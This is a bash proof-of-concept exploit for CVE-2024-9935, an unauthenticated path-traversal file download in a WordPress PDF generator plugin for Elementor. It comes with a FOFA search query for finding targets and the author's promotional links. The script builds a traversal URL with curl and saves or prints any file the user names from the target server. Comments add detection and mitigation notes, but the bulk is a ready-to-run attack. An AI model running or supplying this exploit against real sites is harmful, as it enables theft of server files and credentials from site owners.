# CVE-2024-9935 POC - PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Unauthenticated Arbitrary File Download
# FOFA body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/" && body="wp-content/themes/" 
# Medium https://medium.com/@verylazytech
# Github https://github.com/verylazytech
# My Shop https://buymeacoffee.com/verylazytech/extras
# https://www.verylazytech.com

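#!/usr/bin/env bash
# NOTE: this shebang is not on line 1 of the file, so it is treated as an ordinary comment.
# The script relies on bash-only syntax ((( )) loops, +=, local), so it has to be started with bash explicitly.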

# Print the script's ASCII-art title banner to stdout.
# Takes no arguments and reads no variables; the only command it runs is cat.
banner() {
# The heredoc delimiter is quoted ('EOF'), so the art is emitted literally:
# the backticks and backslashes inside it are not expanded or executed.
cat <<'EOF'
  ______     _______   ____   ___ ____  _  _      ___   ___ _________  
 / ___\ \   / / ____| |___ \ / _ \___ \| || |    / _ \ / _ \___ / ___| 
| |    \ \ / /|  _|     __) | | | |__) | || |_  | (_) | (_) ||_ \___ \ 
| |___  \ V / | |___   / __/| |_| / __/|__   _|  \__, |\__, |__) |__) |
 \____|  \_/  |_____| |_____|\___/_____|  |_|      /_/   /_/____/____/ 
                                                                       
__     __                _                      _____         _     
\ \   / /__ _ __ _   _  | |    __ _ _____   _  |_   _|__  ___| |__  
 \ \ / / _ \ '__| | | | | |   / _` |_  / | | |   | |/ _ \/ __| '_ \ 
  \ V /  __/ |  | |_| | | |__| (_| |/ /| |_| |   | |  __/ (__| | | |
   \_/ \___|_|   \__, | |_____\__,_/___|\__, |   |_|\___|\___|_| |_|
                 |___/                  |___/                       
                                                                      
                    @VeryLazyTech - Medium
                    
EOF
}

# Show the banner first; exit-on-error is only switched on afterwards, so it
# applies to the argument handling and the request below, not to the banner.
banner

set -o errexit

# Percent-encode a string for use inside a URL.
# Arguments: $1 - the text to encode
# Outputs:   the encoded text on stdout, followed by a newline
# Characters matching [a-zA-Z0-9.~_-] are copied through unchanged; every
# other character is replaced by '%' plus its code as upper-case hex.
# NOTE(review): both the bracket pattern and the one-character slicing follow
# the current locale, so non-ASCII input is presumably encoded per character
# (code point) rather than per byte in a multibyte locale - confirm.
urlencode() {
    local input="$1"
    local out=""
    local i=0 ch
    while (( i < ${#input} )); do
        ch=${input:i:1}
        if [[ "$ch" == [a-zA-Z0-9.~_-] ]]; then
            out+="$ch"
        else
            # A leading quote makes printf use the character's numeric code.
            out+=$(printf '%%%02X' "'$ch")
        fi
        i=$(( i + 1 ))
    done
    echo "$out"
}

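# Check for correct number of arguments
if [ "$#" -ne 3 ]; then
    # "$0" is passed as data rather than spliced into the format string, so a
    # '%' or backslash in the script path is not read as a printf directive.
    printf 'Usage: %s <target_url> <file_path_to_download> <action: download|view>\n' "$0"
    exit 1
fi

target_url=$1
file_path=$2
action=$3

# URL-encode the file path
encoded_file_path=$(urlencode "$file_path")

printf "\033[0;32mAttempting to exploit CVE-2024-9935...\033[0m\n"

# Craft the request URL with the encoded file path.
# What the request looks like on the wire: a plain GET with no cookie, nonce
# or other credential, carrying rtw_generate_pdf=true and an rtw_pdf_file
# value that starts with a run of URL-encoded "../" segments (..%2f).
# Detection: in web-server access logs, key on the pairing of
# rtw_generate_pdf=true with an rtw_pdf_file value containing "..%2f" or
# "../". Match case-insensitively (the prefix uses %2f, urlencode emits
# upper-case hex). The /elementor-84/ path segment is hard-coded here and is
# a weaker signature than the two query parameters.
# Mitigation: the header of this file gives plugin versions <= 1.7.5 as
# affected, so sites should run a later release; until then, requests whose
# rtw_pdf_file value contains a traversal sequence can be rejected at the
# WAF or reverse proxy.
exploit_url="$target_url/elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f$encoded_file_path"

# Send the request
if [ "$action" = "download" ]; then
    # Local output name; "--" keeps a leading '-' in the path from being
    # parsed by basename as an option.
    out_name=$(basename -- "$file_path")
    response=$(curl -s -o "$out_name" --write-out "%{http_code}" "$exploit_url")
    # Only the HTTP status is checked; the response body is written to
    # $out_name whatever the status was.
    if [ "$response" -eq 200 ]; then
        printf "\033[0;32m[+] Exploit successful! File saved as '%s'.\033[0m\n" "$out_name"
    else
        printf "\033[0;31m[-] Exploit failed. HTTP Response Code: %s\033[0m\n" "$response"
    fi
elif [ "$action" = "view" ]; then
    # Writing the response to a fixed name in the current directory and then
    # deleting it would overwrite and remove an unrelated local file of the
    # same name, so the body goes to a private mktemp file instead. The EXIT
    # trap removes it on every path, including an errexit abort when curl fails.
    tmp_file=$(mktemp)
    trap 'rm -f -- "$tmp_file"' EXIT
    curl -s -o "$tmp_file" "$exploit_url"
    # This branch reports on body size only; the HTTP status is not consulted.
    if [ -s "$tmp_file" ]; then
        printf "\033[0;32m[+] Exploit successful! File content:\033[0m\n"
        cat -- "$tmp_file"
    else
        printf "\033[0;31m[-] File not found or empty.\033[0m\n"
    fi
else
    printf "\033[0;31m[-] Invalid action: '%s'. Use 'download' or 'view'.\033[0m\n" "$action"
    exit 1
fi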
